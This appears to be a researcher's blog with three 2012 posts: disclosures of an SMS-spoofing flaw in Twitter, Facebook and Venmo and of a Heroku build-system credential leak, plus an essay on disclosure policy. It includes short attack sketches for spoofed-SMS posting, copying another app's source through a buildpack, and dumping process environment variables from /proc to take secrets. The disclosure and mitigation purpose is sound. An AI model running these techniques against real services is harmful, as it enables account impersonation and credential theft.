December 3, 2012
Update: Twitter has fixed the issue for users of short codes. Users who use
a “long code” should enable the PIN code on their account.
Twitter users with SMS enabled are vulnerable to an attack that allows anyone to
post to their account. The attacker only needs knowledge of the mobile number
associated with a target’s Twitter account. Messages can then be sent to Twitter
with the source number spoofed.
Like email, the originating address of an SMS cannot be trusted. Many SMS
gateways allow the originating address of a message to be set to an arbitrary
identifier, including someone else’s number.
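To make the attack concrete, here is a minimal sketch of how a spoofed message could be sent. The gateway endpoint and parameters are invented for illustration; real gateways vary, but many accept an arbitrary source address in exactly this way.

import requests  # third-party HTTP client

# Hypothetical SMS gateway endpoint, for illustration only.
GATEWAY_URL = "https://sms-gateway.example.com/api/send"

def send_spoofed_sms(spoofed_source, destination, body):
    """Send an SMS whose originating address is someone else's number."""
    response = requests.post(GATEWAY_URL, data={
        "from": spoofed_source,  # the victim's mobile number
        "to": destination,       # e.g. Twitter's long code for the region
        "text": body,            # any Twitter SMS command, such as a tweet
    })
    response.raise_for_status()

If the spoofed number belongs to a Twitter account with no PIN code set, the message body is processed as if the victim had sent it.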
Facebook and Venmo were also vulnerable to the same spoofing attack, but
the issues were resolved after I disclosed them to their respective security teams.
Users of Twitter who have a mobile number associated with their account and
have not set a PIN code are vulnerable. All of the Twitter SMS commands can be
used by an attacker, including the ability to post tweets and modify profile
information.
All services that trust the originating address of SMS messages implicitly and
are not using a short code are vulnerable.
Until Twitter removes the ability to post via non-short code numbers, users
should enable PIN codes (if available in their region) or disable the mobile
text messaging feature.
Twitter has a PIN code feature that requires every message to be prepended
with a four-digit alphanumeric code. This feature mitigates the issue, but is
not available to users inside the United States.
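For illustration, here is a rough sketch of how a service might enforce such a PIN on inbound messages. The storage and names are my own assumptions, not Twitter’s implementation.

# Hypothetical per-account PIN storage, for illustration only.
PIN_BY_NUMBER = {"+15555550123": "a1b2"}

def handle_inbound_sms(source_number, body):
    expected = PIN_BY_NUMBER.get(source_number)
    if expected is None:
        return body  # no PIN set: the message is trusted as-is (vulnerable)
    pin, _, command = body.partition(" ")
    if pin.lower() != expected:
        return None  # missing or wrong PIN: drop the message
    return command   # PIN matched: safe to process the command

Because an attacker can spoof the source number but does not know the PIN, spoofed messages are simply dropped.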
The cleanest solution for providers is to use only an SMS short code to receive
incoming messages. In most cases, messages to short codes do not leave the
carrier network and can only be sent by subscribers. This removes the ease of
spoofing via SMS gateways.
An alternative, less user-friendly but more secure solution is to require
a challenge-response for every message. After receiving an SMS, the service
would reply with a short alphanumeric string that needs to be repeated back
before the message is processed.
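Here is a sketch of that flow, with send_sms and process standing in for the provider’s own outbound-SMS and message-handling functions:

import secrets

pending = {}  # source number -> (challenge, original message)

def send_sms(number, text):
    ...  # placeholder for the provider's outbound SMS API

def process(number, message):
    ...  # placeholder for normal message handling

def on_inbound_sms(number, body):
    if number in pending:
        challenge, message = pending.pop(number)
        if body.strip() == challenge:
            process(number, message)  # sender proved control of the number
        return
    challenge = secrets.token_hex(3)  # short random string, e.g. "f3a91c"
    pending[number] = (challenge, body)
    send_sms(number, "Reply with %s to confirm your message." % challenge)

A spoofer never receives the challenge, because it is delivered to the real owner of the number.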
The issue I filed was initially inspected by a member of their security team,
but was then routed to the normal support team who did not believe that SMS
spoofing was possible. I then reached out directly to someone on the security
team who said that it was an “old issue” but that they did not want me to
publish until they got “a fix in place”. I received no further communication.
17 Aug 2012: I notified Twitter about the vulnerability via their web form.
20 Aug 2012: Twitter Security routed my report to their mobile support team.
6 Sep 2012: Twitter asked me not to publish until they had fixed the issue.
15 Oct 2012: I requested an update on the issue and received no response.
28 Nov 2012: I notified Twitter that I would publicly disclose this issue.
4 Dec 2012: I received confirmation that the issue had been resolved.
Initially Facebook did not respond to my report on their security vulnerability
page. I then emailed a friend who works at Facebook, who facilitated my contact
with their security team.
19 Aug 2012: I notified Facebook about the vulnerability via their web form.
6 Sep 2012: I received a response after getting a friend on the engineering team to bump the issue internally.
28 Nov 2012: I received confirmation that the issue had been resolved.
Disclosure: I will receive a bounty from Facebook for finding and reporting
this issue to them. The Facebook bounty
program requires responsible
disclosure and time to resolve internally in “good faith” before publishing.
I initially disclosed this issue to Venmo support, as they do not have
a published security contact. When I did not receive a response, I notified the
Braintree security team (Braintree recently acquired Venmo), who responded
very promptly.
29 Nov 2012: I notified Venmo support about the vulnerability.
30 Nov 2012: I notified Braintree security and received a response within 40 minutes.
1 Dec 2012: I received confirmation that Venmo SMS payments had been disabled, mitigating the vulnerability.

July 6, 2012
Every company with public-facing web applications needs a clear security
disclosure policy. This policy serves three main purposes. First, it tells people
who discover a vulnerability how to proceed and what your response will be, so
they can report problems easily. Second, it tells your employees exactly how to
process and respond to these reports. Most importantly, a clear public security
policy lets your users know in advance how you will respond to recently
discovered vulnerabilities.
As I discovered last week when notifying Heroku of a vulnerability in their
build system, even the most
progressive, respected companies don’t always get it 100% right.
No matter how well designed your application, users will find bugs. When (not
if) that happens, it is vital that the person who discovers the vulnerability
knows how to report it.
Bug reporting is a funnel, just like every other part of your web application.
If users get confused or decide you are not worth their time, they will leave
the site without converting. In this case your “users” may be curious hackers,
security researchers, or even your own customers. It’s your job to make
reporting as easy, painless, and rewarding as possible. If you fail, you risk
not finding out about the vulnerability, which could endanger your users’ data
and the company’s future. Remember, the person reporting a security flaw is
being friendly and doing you a big favor. Treat them accordingly.
At some point, someone will need to report a security vulnerability. You don’t
want to have that conversation in public or in the clear. It is also not
a problem you want to outsource to Twitter, Facebook, or a forum. The first
thing on your security page should be a mailto link to an address like security@yourcompany.com.
The second is a PGP public key, which can be used to send you encrypted
messages. This page should always be served over HTTPS. Only by securing
each step of the communication process can the sender be sure that the person
they are emailing is who they claim to be and that the report cannot be
intercepted. If the PGP key is not posted already, a responsible hacker might
email a request for one to be posted, which wastes valuable time. The person
discovering the vulnerability might become unavailable by the time the key is
posted, causing further delays.
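To illustrate the reporter’s side, here is a minimal sketch using the python-gnupg library, assuming the company’s public key has been downloaded from their HTTPS security page and saved locally:

import gnupg  # python-gnupg, a wrapper around the gpg binary

gpg = gnupg.GPG()
with open("security-team.asc") as f:
    imported = gpg.import_keys(f.read())

report = "Details of the vulnerability: ..."
encrypted = gpg.encrypt(report, imported.fingerprints[0])
assert encrypted.ok, encrypted.status
print(str(encrypted))  # ASCII-armored ciphertext, safe to paste into an email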
The policies listed on this page should be clear, concise, and friendly. The
person who discovers a vulnerability is already in a difficult position and it
is important they understand your policies.
A person who accidentally discovers a vulnerability may need to experiment
further to see how far the problem goes, and even whether it is in fact
a vulnerability. Often it is not possible to determine the nature of
a vulnerability without trying to do something that should not normally be
possible or allowed. Unfortunately parts of this process often necessarily run
afoul of the law in some jurisdictions, meaning that if the hacker wants to
report a problem to a company, s/he needs to admit to participating in
a possibly illegal activity. Some companies make this difficult situation worse
by threatening legal action, either outright or when disclosing hackers refuse
to sign a retroactive NDA. Minor penetration is a routine part of security testing
and user exploration. Regardless of the legal threats available to your company,
using them against users, hackers, or researchers who acted without malicious
intent is never advisable.
For these reasons it is vital that you indemnify and hold blameless anyone who
penetrates your site and, in the process of exploring or experimenting, extracts
a small amount of sensitive data, promptly notifies you, and then destroys any
data collected. Without a clear and binding promise of immunity from future
prosecution, those who discover vulnerabilities may not notify you at all.
Publishing a clear policy that protects the party disclosing an exploit is the
first, and most important step in building trust.
Details about a vulnerability are worth a great deal of money. This kind of
information is valuable not only to your competitors, but also on growing black
and grey markets. Many other parties would pay for the details of
a vulnerability in order to exploit it themselves. This means that anyone
discovering a vulnerability on your site could sell it easily. Knowledge of
a vulnerability will always be worth more to your company than any of these
others. However, a hacker asking for money either before or after making
a disclosure can make everyone uncomfortable. Avoid this situation entirely by
advertising generous bounties ahead of time.
The free market determines how much a vulnerability in your system is worth. For
products with large user bases, the prices can get very high.
The best companies also make their pre-release code or a staging server with
dummy data available for testing with even higher rewards. In this case exploits
can be found and remedied before users’ data is ever compromised.
Without the threat of full disclosure, responsible disclosure would not work,
and vendors would go back to ignoring security vulnerabilities.
Do not ever try to get hackers or researchers to take a bounty in exchange for
not publishing their discovery (and it is their discovery). Unfortunately some
companies offer bounties only in exchange for silence. Don’t attach strings to
bounties. Many hackers prize recognition higher than remuneration, and there’s
no need to deprive them of both. Similarly, security researchers make their
living off of their reputation for discovering holes. A great policy is to
offer a reasonable no-strings-attached bounty and then double it for responsible
disclosure. Responsible disclosure is when the researcher who discovered a vulnerability notifies the creator of
the product and allows them a reasonable amount of time to fix it. After that
time, the researcher publishes the details publicly regardless of whether the
users have been officially notified.
No matter what, remember that someone disclosing a vulnerability to you directly
is usually trying to do the right thing.
Respond very quickly. When the crisis ends, the discussion will be about how
your company handled the situation. It is crucial that the relevant team began
work immediately instead of waiting until the next day, or for a lawyer’s
permission to talk to the person who reported the problem. Any delay will look
like either incompetence or a conspiracy to cover up the vulnerability. You
can’t afford for customers or the press to think either. Your customers will be
busy checking their own data and deciding whether they should change providers.
The timing of your response should not give them another reason to leave.
Emails to that security address are your company’s highest priority,
period. Your lawyer, investors, and mother can all wait. Messages to that
address should be forwarded to the highest ranking member of your
security/ops/engineering team on call and the CEO. If you don’t have a 24-hour
on-call rotation, create a script with Twilio, Tropo, or Adhearsion that wakes
up the CEO or founders. Whoever needs to respond to the problem gets woken up
and/or called back from vacation. You asked your customers to trust you with their
data (and often their own customers’ as well). Many of those affected would
gladly wake up themselves to fix it if they were able. You have an obligation to
respond as quickly as you are physically able.
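Here is a rough sketch of such a wake-up script using Twilio’s Python helper library. The credentials, phone numbers, and TwiML URL are placeholders:

from twilio.rest import Client

ACCOUNT_SID = "ACXXXXXXXXXXXXXXXX"  # your Twilio account SID
AUTH_TOKEN = "your-auth-token"
ON_CALL = ["+15555550100", "+15555550101"]  # CEO, founders, ops lead

def wake_everyone(twiml_url):
    """Ring every on-call number; twiml_url serves the spoken alert."""
    client = Client(ACCOUNT_SID, AUTH_TOKEN)
    for number in ON_CALL:
        client.calls.create(
            to=number,
            from_="+15555550199",  # your Twilio number
            url=twiml_url,         # TwiML instructions for the call
        )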
Hearing about a vulnerability is a high stress time for your team. Try not to
make it worse. They already feel like they screwed up no matter what caused the
vulnerability. Don’t have a blame culture; make it clear you’re all on the same
team and share a single mission: doing the best you can for your customers.
Your security team needs to be in direct contact immediately with the person who
discovered the vulnerability. Any attempts at legal maneuvering will slow down
their response and distract the only people who can fix the problem(s). Make it
clear that your team’s responsibility is to patch the application, not manage
your company’s strategic communications. If developers are free to treat each
other as peers without a lawyer leaning over their shoulders, the patch will
arrive much sooner.
Customers need to know about a problem after it has been patched. Public
disclosure means you get caught with your pants down. Discovery without
disclosure means someone has a backdoor to your users’ lives and businesses.
Which do you think they would prefer? Your obligation to your customers comes
first, regardless of any embarrassment it might cause. If world governments are
not able to keep their embarrassing secrets, it is unlikely you will be able to
either (for long). Honest and direct communication builds user loyalty; hiding
the failures that affect your users causes far bigger problems.
From best to worst, the possible outcomes are:
- All vulnerabilities caught in the pre-release stage.
- Vulnerabilities in production code caught and responsibly disclosed.
- Vulnerabilities caught and disclosed to users and company simultaneously.
- Vulnerabilities discovered by malicious party and exploited without company or user knowledge.
Always remember when you are dealing with disclosure of a security issue that
things could be much worse: you could not know about it.
July 3, 2012
Update: Heroku’s official response.
Last week I discovered a major security flaw in the Heroku build
system. This vulnerability exposed sensitive information including API keys,
private keys, and server credentials.
Once I realized the extent of the vulnerability, I immediately informed Heroku.
I have been in regular contact with their security team and the problem has
since been fixed.
Understanding the issue requires operational knowledge of the Cedar stack build process.
Cedar Build Process
Since Heroku runs on Heroku, after
receiving a git push of an application, the build request is dispatched to
a regular Heroku app named Codon that handles builds. Codon runs
a buildpack which compiles
the application so that it can be deployed.
Normally, apps running on Heroku are entirely isolated using Linux
Containers, but to perform builds, Codon runs
untrusted code inside its own container.
Source Code Exposure
I encountered a Ruby exception and backtrace from the Heroku build system while
experimenting with custom buildpacks. Ruby backtraces look like this:
app.rb:2:in `foo': undefined method `a' for nil:NilClass (NoMethodError)
from app.rb:5:in `<main>'
Backtraces include the paths to the source files that encountered the exception.
This pointed me to the source files for Codon, which indicated the possibility
of gaining read access to the code.
I then ran a custom buildpack that copied the source code into my Heroku app and
verified that it was possible to view the source code of Codon.
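The buildpack API hands bin/compile the app’s build directory as its first argument, so a malicious compile script only needs to copy files it can read into that directory. Here is a sketch; the path to Codon’s source is an assumption for illustration:

#!/usr/bin/env python
# Sketch of a malicious buildpack's bin/compile script.
import os, shutil, sys

build_dir = sys.argv[1]   # provided by the buildpack API
codon_src = "/app/codon"  # hypothetical location of Codon's source
shutil.copytree(codon_src, os.path.join(build_dir, "stolen-codon"))
# The copied source deploys with the attacker's own app, where it can
# be read at leisure.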
While examining the source code I discovered that there was another
vulnerability that was much more serious than source code exposure.
Sensitive Credential Exposure
Like most Heroku apps, Codon uses environment
variables to configure
runtime options including sensitive credentials. This ensures that credentials
are not checked into version control. However, due to the constraints of Heroku
containers, Codon is running as the same user as the buildpack, which is
untrusted. This allows the buildpack to dump the environment variables of Codon
from the Linux process table:
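# A minimal sketch of the technique (not the original proof of concept):
# on Linux, /proc/<pid>/environ is readable by any process running as
# the same user as <pid>.
import os

def dump_environments():
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open("/proc/%s/environ" % pid, "rb") as f:
                raw = f.read()
        except OSError:
            continue  # owned by another user, or the process has exited
        for entry in raw.decode("utf-8", errors="replace").split("\0"):
            if "=" in entry:
                print(pid, entry)

dump_environments()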
The environment variables exposed included critical credentials such as internal
API keys, an SSH private key with access to source code repositories, Redis
connection details, and a key with access to their Campfire account.
Immediately after discovering this vulnerability, I sent an email to Heroku’s
security team to start the disclosure process. I requested a PGP key first, as
they did not provide one on their website. Here is the discovery and disclosure timeline:
2012-06-26 19:45 PDT: Encountered backtrace and began experimenting.
2012-06-26 20:25 PDT: Sent email to Heroku asking for PGP key.
2012-06-26 22:40 PDT: Received PGP key from Heroku.
2012-06-26 22:56 PDT: Received follow-up email with mobile phone number of a Heroku security engineer.
2012-06-26 22:58 PDT: Sent PGP-encrypted description of the vulnerability.
2012-06-26 23:06 PDT: Received confirmation of receipt.
2012-06-27 12:01 PDT: Received confirmation that an interim patch would be pushed in a few hours, and a full patch by Tuesday (2012-07-03).
2012-06-28 20:44 PDT: Checked validity of credentials; SSH and Campfire keys were still valid.
2012-06-29 16:13 PDT: Checked validity of credentials; all credentials were invalid.
2012-07-03 13:35 PDT: Received confirmation that the issue had been patched.
The build system appears to have been vulnerable since the Cedar stack was launched
a year ago. Customer applications and credentials could have been compromised at
some point due to the credentials exposed by the vulnerability. Anyone who ran
applications on Heroku during this period should immediately reset all sensitive
credentials and audit their access logs to determine if any infrastructure or
data has been accessed.
I suspect that a variant of this vulnerability may exist in other Platform as
a Service build systems. Further research is warranted.
Full Disclosure: I remain a Heroku customer with several apps in
production, and I have no plans to change platforms. Heroku offered me a paid
penetration test contract, but required that I sign a retroactive non-disclosure
agreement which would have precluded publishing this article.
If you liked this, then you should check out my article on security
disclosure policy best practices.